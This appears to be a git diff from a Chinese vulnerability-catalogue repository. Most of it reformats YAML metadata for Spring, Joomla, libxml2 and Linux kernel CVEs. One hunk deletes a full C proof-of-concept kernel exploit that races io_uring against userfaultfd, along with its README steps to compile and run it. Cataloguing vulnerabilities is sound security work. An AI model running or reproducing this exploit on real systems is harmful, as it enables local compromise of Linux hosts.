description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。
|
||||
scope-of-influence: Spring Framework <5.2.20 and JDK >=9
|
||||
scope-of-influence:
|
||||
Spring Framework <5.2.20 and JDK >=9
|
||||
reference:
|
||||
- https://help.aliyun.com/noticelist/articleid/1061022382.html
|
||||
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
|
||||
|
|
|
|||
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。
|
||||
severity: critical
|
||||
description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。
|
||||
scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8
|
||||
scope-of-influence:
|
||||
5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31692
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2023-23752
|
||||
source:
|
||||
https://github.com/Jenderal92/Joomla-CVE-2023-23752
|
||||
source: https://github.com/Jenderal92/Joomla-CVE-2023-23752
|
||||
info:
|
||||
name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。
|
||||
severity: medium
|
||||
|
|
@ -17,5 +16,4 @@ info:
|
|||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 非法访问
|
||||
tags: 非法访问
|
||||
|
|
@ -16,4 +16,4 @@ info:
|
|||
cwe-id: CWE-125
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2020,缓冲区错误
|
||||
tags: cve2020, 缓冲区错误
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3517
|
||||
classification:
|
||||
|
|
@ -16,4 +16,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,缓冲区错误
|
||||
tags: cve2021, 缓冲区错误
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3518
|
||||
classification:
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3537
|
||||
classification:
|
||||
|
|
|
|||
|
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2011-4916
|
||||
source: https://www.openwall.com/lists/oss-security/2011/11/05/3
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: medium
|
||||
description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4916
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: medium
|
||||
description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4916
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
|
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2011-4917
|
||||
source: https://www.openwall.com/lists/oss-security/2011/11/07/9
|
||||
info:
|
||||
name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
|
||||
severity: medium
|
||||
description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2011-4917
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4917
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
|
||||
severity: medium
|
||||
description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2011-4917
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4917
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
|
|
@ -37,6 +37,7 @@ info:
|
|||
- https://usn.ubuntu.com/4117-1/
|
||||
- https://usn.ubuntu.com/4118-1/
|
||||
- https://www.debian.org/security/2019/dsa-4484
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2019-13272
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ id: CVE-2020-12351
|
|||
source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
severity: High
|
||||
description: |
|
||||
Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
|
||||
scope-of-influence:
|
||||
|
|
|
|||
|
|
@ -6,15 +6,17 @@ info:
|
|||
description: |
|
||||
Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。
|
||||
scope-of-influence:
|
||||
v2.6.19-rc1~v5.12-rc7
|
||||
v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22555
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-22555
|
||||
cwe-id: CWE-787
|
||||
tags: cve2021,权限提升,容器逃逸
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升, 容器逃逸
|
||||
|
|
@ -11,8 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/cve-2021-26708
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.0
|
||||
cve-id: CVE-2021-26708
|
||||
cwe-id: CWE-667
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升
|
||||
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/
|
||||
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2021-29155
|
||||
cwe-id: CWE-125
|
||||
|
|
|
|||
|
|
@ -5,11 +5,9 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。
|
||||
|
||||
scope-of-influence:
|
||||
Red Hat Enterprise Linux 8
|
||||
Linux kernel before 5.12.13
|
||||
|
||||
Linux kernel < 5.12.13
|
||||
reference:
|
||||
- https://access.redhat.com/security/cve/CVE-2021-33624
|
||||
- https://ubuntu.com/security/CVE-2021-33624
|
||||
|
|
@ -17,7 +15,6 @@ info:
|
|||
- https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html
|
||||
- https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db
|
||||
- http://www.openwall.com/lists/oss-security/2021/06/21/1
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 4.7
|
||||
|
|
@ -25,5 +22,4 @@ info:
|
|||
cwe-id: CWE-203
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
|
||||
tags: 内存泄露, 侧信道攻击
|
||||
|
|
@ -15,4 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-22555
|
||||
cwe-id: CWE-120
|
||||
tags: cve2021,权限提升
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
||||
|
|
@ -11,13 +11,15 @@ info:
|
|||
Ubuntu 18.04 LTS
|
||||
Ubuntu 16.04 LTS
|
||||
Ubuntu 14.04 ESM
|
||||
(Linux-kernel < 5.11)
|
||||
Linux-kernel < 5.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3493
|
||||
- https://ubuntu.com/security/notices/USN-4917-1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-3493
|
||||
cwe-id: CWE-269, CEW-270
|
||||
tags: cve2021,权限提升
|
||||
cwe-id: CWE-269, CWE-270
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
||||
|
|
@ -17,4 +17,6 @@ info:
|
|||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-4154
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 内存错误引用
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
|
||||
scope-of-influence:
|
||||
Linux 2.1.94~v5.13.12
|
||||
Linux 2.1.94 < Linux-Kernel < v5.13.12
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42008
|
||||
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
|
||||
|
|
@ -16,6 +16,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-42008
|
||||
cwe-id: CWE-787
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 协议解码溢出
|
||||
|
|
@ -11,8 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-4204
|
||||
- https://www.openwall.com/lists/oss-security/2022/01/11/4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-score: 7.1
|
||||
cve-id: CVE-2021-4204
|
||||
cwe-id: CWE-787, CEW-20
|
||||
tags: cve2021,权限提升
|
||||
cwe-id: CWE-787, CWE-20
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
||||
|
|
@ -5,13 +5,10 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。
|
||||
|
||||
scope-of-influence:
|
||||
Linux kernel before 5.14.14
|
||||
|
||||
Linux kernel < 5.14.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2021-42327
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.7
|
||||
|
|
@ -19,5 +16,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
|
||||
tags: 缓冲区溢出
|
||||
|
|
@ -1,6 +0,0 @@
|
|||
### 漏洞复现
|
||||
```shell
|
||||
$ gcc poc.c -o poc
|
||||
$ chmod +x ./poc
|
||||
$ ./poc
|
||||
```
|
||||
|
|
@ -1,174 +0,0 @@
|
|||
#define _GNU_SOURCE
|
||||
#include <linux/io_uring.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <liburing.h>
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
#include <linux/userfaultfd.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <err.h>
|
||||
|
||||
static int userfaultfd(int flags)
|
||||
{
|
||||
return syscall(__NR_userfaultfd, flags);
|
||||
}
|
||||
|
||||
static char buffer[4096];
|
||||
static void fault_manager(int ufd)
|
||||
{
|
||||
struct uffd_msg msg;
|
||||
struct uffdio_copy copy;
|
||||
read(ufd, &msg, sizeof(msg));
|
||||
if (msg.event != UFFD_EVENT_PAGEFAULT)
|
||||
err(1, "event not pagefault");
|
||||
copy.dst = msg.arg.pagefault.address;
|
||||
copy.src = (long) buffer;
|
||||
copy.len = 4096;
|
||||
copy.mode = 0;
|
||||
copy.copy = 0;
|
||||
sleep(2);
|
||||
ioctl(ufd, UFFDIO_COPY, ©);
|
||||
close(ufd);
|
||||
}
|
||||
|
||||
static char *bogus;
|
||||
|
||||
static void start_ufd(int ufd)
|
||||
{
|
||||
struct uffdio_api api;
|
||||
struct uffdio_register reg;
|
||||
|
||||
bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
|
||||
api.api = UFFD_API;
|
||||
api.features = 0;
|
||||
api.ioctls = 0;
|
||||
ioctl(ufd, UFFDIO_API, &api);
|
||||
|
||||
reg.range.start = (long) bogus;
|
||||
reg.range.len = 4096;
|
||||
reg.mode = UFFDIO_REGISTER_MODE_MISSING;
|
||||
reg.ioctls = 0;
|
||||
|
||||
ioctl(ufd, UFFDIO_REGISTER, ®);
|
||||
}
|
||||
|
||||
|
||||
int sendfd(int s, int fd)
|
||||
{
|
||||
struct msghdr msg;
|
||||
char buf[4096];
|
||||
struct cmsghdr *cmsg;
|
||||
int fds[1] = { fd };
|
||||
|
||||
memset(&msg, 0, sizeof(msg));
|
||||
memset(buf, 0, sizeof(buf));
|
||||
|
||||
msg.msg_control = buf;
|
||||
msg.msg_controllen = sizeof(buf);
|
||||
|
||||
cmsg = CMSG_FIRSTHDR(&msg);
|
||||
cmsg->cmsg_level = SOL_SOCKET;
|
||||
cmsg->cmsg_type = SCM_RIGHTS;
|
||||
cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
|
||||
memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
|
||||
|
||||
msg.msg_controllen = CMSG_SPACE(sizeof(fds));
|
||||
|
||||
sendmsg(s, &msg, 0);
|
||||
}
|
||||
|
||||
int io_uring_setup(int r, void *p)
|
||||
{
|
||||
return syscall(__NR_io_uring_setup, r, p);
|
||||
}
|
||||
|
||||
int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig)
|
||||
{
|
||||
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
|
||||
}
|
||||
|
||||
int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args)
|
||||
{
|
||||
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
|
||||
}
|
||||
|
||||
int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring)
|
||||
{
|
||||
struct io_uring_sqe *sqe;
|
||||
io_uring_queue_mmap(fd, params, ring);
|
||||
sqe = io_uring_get_sqe(ring);
|
||||
sqe->opcode = IORING_OP_WRITEV;
|
||||
sqe->fd = 1;
|
||||
sqe->addr = (long) bogus;
|
||||
sqe->len = 1;
|
||||
sqe->flags = IOSQE_FIXED_FILE;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int ufd;
|
||||
pid_t manager;
|
||||
|
||||
struct io_uring ring;
|
||||
int fd;
|
||||
struct io_uring_params *params;
|
||||
int rfd[32];
|
||||
int s[2];
|
||||
int backup_fd;
|
||||
|
||||
struct iovec *iov;
|
||||
iov = (void *) buffer;
|
||||
iov->iov_base = "hello, world!\n";
|
||||
iov->iov_len = 14;
|
||||
|
||||
ufd = userfaultfd(0);
|
||||
if (ufd < 0)
|
||||
err(1, "userfaultfd");
|
||||
start_ufd(ufd);
|
||||
|
||||
if ((manager = fork()) == 0) {
|
||||
fault_manager(ufd);
|
||||
exit(0);
|
||||
}
|
||||
close(ufd);
|
||||
|
||||
socketpair(AF_UNIX, SOCK_DGRAM, 0, s);
|
||||
|
||||
params = malloc(sizeof(*params));
|
||||
memset(params, 0, sizeof(*params));
|
||||
params->flags = IORING_SETUP_SQPOLL;
|
||||
fd = io_uring_setup(32, params);
|
||||
|
||||
rfd[0] = s[1];
|
||||
rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644);
|
||||
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2);
|
||||
close(rfd[1]);
|
||||
|
||||
sendfd(s[0], fd);
|
||||
|
||||
close(s[0]);
|
||||
close(s[1]);
|
||||
|
||||
prepare_request(fd, params, &ring);
|
||||
io_uring_submit(&ring);
|
||||
|
||||
io_uring_queue_exit(&ring);
|
||||
|
||||
sleep(1);
|
||||
|
||||
close(socket(AF_UNIX, SOCK_DGRAM, 0));
|
||||
|
||||
wait(NULL);
|
||||
wait(NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -6,14 +6,16 @@ info:
|
|||
description: |
|
||||
Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。
|
||||
scope-of-influence:
|
||||
5.1-rc1~5.16.2
|
||||
5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0185
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.4
|
||||
cve-id: CVE-2022-0185
|
||||
cwe-id: CWE-190
|
||||
tags: 权限提升,容器逃逸,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, 容器逃逸, cve2022
|
||||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-0435
|
||||
source:
|
||||
https://github.com/wlswotmd/CVE-2022-0435
|
||||
source: https://github.com/wlswotmd/CVE-2022-0435
|
||||
info:
|
||||
name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
|
||||
severity: high
|
||||
|
|
|
|||
|
|
@ -2,18 +2,20 @@ id: CVE-2022-0492
|
|||
source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
severity: High
|
||||
description: |
|
||||
A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
|
||||
scope-of-influence:
|
||||
2.6.24-rc1~5.17-rc3
|
||||
2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0492
|
||||
- https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0492
|
||||
cwe-id: CWE-287
|
||||
tags: 权限提升,容器逃逸,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, 容器逃逸, cve2022
|
||||
|
|
@ -12,7 +12,7 @@ info:
|
|||
- https://bugzilla.redhat.com/show_bug.cgi?id=2060795
|
||||
- https://security.netapp.com/advisory/ntap-20220325-0005/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0847
|
||||
cwe-id: CWE-665, CWE-281
|
||||
|
|
|
|||
|
|
@ -15,6 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0995
|
||||
cwe-id: CWE-787
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
tags: 内核越界,权限提升,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 内核越界, 权限提升, cve2022
|
||||
|
|
@ -2,17 +2,19 @@ id: CVE-2022-1015
|
|||
source: https://github.com/pqlx/CVE-2022-1015
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
severity: Medium
|
||||
description: |
|
||||
在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。
|
||||
scope-of-influence:
|
||||
5.12 ≤ kernel < 5.17
|
||||
5.12 ≤ Linux-Kernel < 5.17
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1015
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
|
||||
cvss-score: 6.6
|
||||
cve-id: CVE-2022-1015
|
||||
cwe-id: CWE-787
|
||||
tags: cve2022,权限提升
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022, 权限提升
|
||||
|
|
@ -16,4 +16,5 @@ info:
|
|||
cve-id: CVE-2022-1679
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, cve2022
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.8 && <=5.16)
|
||||
5.8 ≤ Linux kernel ≤ 5.16
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2022/06/04/3
|
||||
- https://security.netapp.com/advisory/ntap-20220217-0002/
|
||||
|
|
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-476
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022,权限提升
|
||||
tags: cve2022, 权限提升
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.14 && <=5.16.4)
|
||||
5.14 ≤ Linux kernel ≤ 5.16.4
|
||||
reference:
|
||||
- https://ubuntu.com/security/CVE-2022-24122
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-25258
|
||||
source:
|
||||
